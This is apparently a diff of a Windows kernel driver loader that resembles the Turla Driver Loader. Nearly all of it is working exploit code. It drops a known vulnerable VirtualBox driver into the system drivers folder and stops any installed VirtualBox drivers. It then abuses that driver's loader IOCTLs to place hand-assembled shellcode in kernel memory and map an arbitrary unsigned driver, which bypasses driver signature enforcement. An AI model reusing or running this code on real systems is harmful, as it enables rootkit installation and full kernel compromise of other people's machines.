Cookie.u.In.u32ReqVersion = 0; - Cookie.u.In.u32MinVersion = 0x00070002; - RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, - &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, - SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); - break; - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); + break; + } - RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); - OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; - OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; - OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - OpenLdr.Hdr.rc = 0; - OpenLdr.u.In.cbImage = CodeSize; - RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); - u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - ImageBase = OpenLdr.u.Out.pvImageBase; + ImageBase = OpenLdr.u.Out.pvImageBase; - memIO = PAGE_SIZE + CodeSize; - NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memIO = PAGE_SIZE + CodeSize; + NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (pLoadTask == NULL) - break; + if (pLoadTask == NULL) + break; - pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - pLoadTask->Hdr.cbIn = - (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; - pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; - pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; - pLoadTask->Hdr.rc = 0; - pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; - pLoadTask->u.In.pvImageBase = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; - RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); - pLoadTask->u.In.cbImage = CodeSize; + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, - pLoadTask, pLoadTask->Hdr.cbIn, - pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase, _strend(text)); - _strcat(text, TEXT(", size = 0x")); - ultohex(CodeSize, _strend(text)); + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); - _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); - vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - vmFast.Hdr.rc = 0; - vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; - vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; - vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); - paramOut = 0; - DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, - NULL, 0, - ¶mOut, sizeof(paramOut), &bytesIO, NULL); + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); - ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; - ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; - ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - ldrFree.Hdr.rc = 0; - ldrFree.u.In.pvImageBase = ImageBase; + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; - DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); - break; - } + break; + } - if (pLoadTask != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); - } + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } - if (g_hVBox != INVALID_HANDLE_VALUE) { - CloseHandle(g_hVBox); - g_hVBox = INVALID_HANDLE_VALUE; - } + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } } /* @@ -376,129 +376,129 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName - ) + LPWSTR lpDriverFullName +) { - UINT result = (UINT)-1; - ULONG isz; - SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; - HMODULE Image = NULL; - PIMAGE_NT_HEADERS FileHeader; - PBYTE Buffer = NULL; - UNICODE_STRING uStr; - ANSI_STRING routineName; - NTSTATUS status; - WCHAR text[256]; + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; - KernelBase = supGetNtOsBase(); - while (KernelBase != 0) { + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { - _strcpy(text, TEXT("Ldr: Kernel base = 0x")); - u64tohex(KernelBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&uStr, sizeof(uStr)); - RtlInitUnicodeString(&uStr, lpDriverFullName); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); - if ((!NT_SUCCESS(status)) || (Image == NULL)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); - u64tohex((ULONG_PTR)Image, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) || (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - FileHeader = RtlImageNtHeader(Image); - if (FileHeader == NULL) - break; + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; - isz = FileHeader->OptionalHeader.SizeOfImage; + isz = FileHeader->OptionalHeader.SizeOfImage; - cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); - if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); - u64tohex(KernelImage, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "ExAllocatePoolWithTag"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); - if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); - u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - memIO = isz + PAGE_SIZE; - NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - if (Buffer == NULL) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); - u64tohex((ULONG_PTR)Buffer, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - // mov rcx, ExAllocatePoolWithTag - // mov rdx, PsCreateSystemThread + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread - Buffer[0x00] = 0x48; // mov rcx, xxxxx - Buffer[0x01] = 0xb9; - *((PULONG_PTR)&Buffer[2]) = - KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); - cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); - cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); - result = 0; - break; - } + cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } - if (Buffer != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); - } + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } - return result; + return result; } /* @@ -510,123 +510,123 @@ UINT TDLMapDriver( * */ HANDLE TDLStartVulnerableDriver( - VOID - ) + VOID +) { - PBYTE DrvBuffer; - ULONG DataSize = 0, bytesIO; - HANDLE hDevice = INVALID_HANDLE_VALUE; - WCHAR szDriverFileName[MAX_PATH * 2]; - SC_HANDLE schSCManager = NULL; - LPWSTR msg; + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; - DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); - while (DrvBuffer != NULL) { + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { - //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. - RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); - if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error opening SCM database"), - g_ConsoleOutput, TRUE); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive - if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), - g_ConsoleOutput, TRUE); + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); - if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetAdp driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetLwf driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxUSBMon driver unloaded"), - g_ConsoleOutput, TRUE); - } - Sleep(1000); - if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxDrv driver unloaded"), - g_ConsoleOutput, TRUE); - } - } + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } - //if vbox installed backup it driver, do it before dropping our - if (g_VBoxInstalled) { - if (supBackupVBoxDrv(FALSE) == FALSE) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error while doing VirtualBox driver backup"), - g_ConsoleOutput, TRUE); + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); - break; - } - } + break; + } + } - //drop our vboxdrv version - _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); - bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, - (SIZE_T)DataSize, FALSE, FALSE); + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); - if (bytesIO != DataSize) { + if (bytesIO != DataSize) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error writing VirtualBox on disk"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //if vbox not found in system install driver in scm - if (g_VBoxInstalled == FALSE) { - scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); - } + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } - //run driver - if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) != FALSE) { - if (scmOpenDevice(VBoxDrvSvc, &hDevice)) - msg = TEXT("SCM: Vulnerable driver loaded and opened"); - else - msg = TEXT("SCM: Driver device open failure"); + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); - } - else { - msg = TEXT("SCM: Vulnerable driver load failure"); - } + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } - cuiPrintText(g_ConOut, msg, 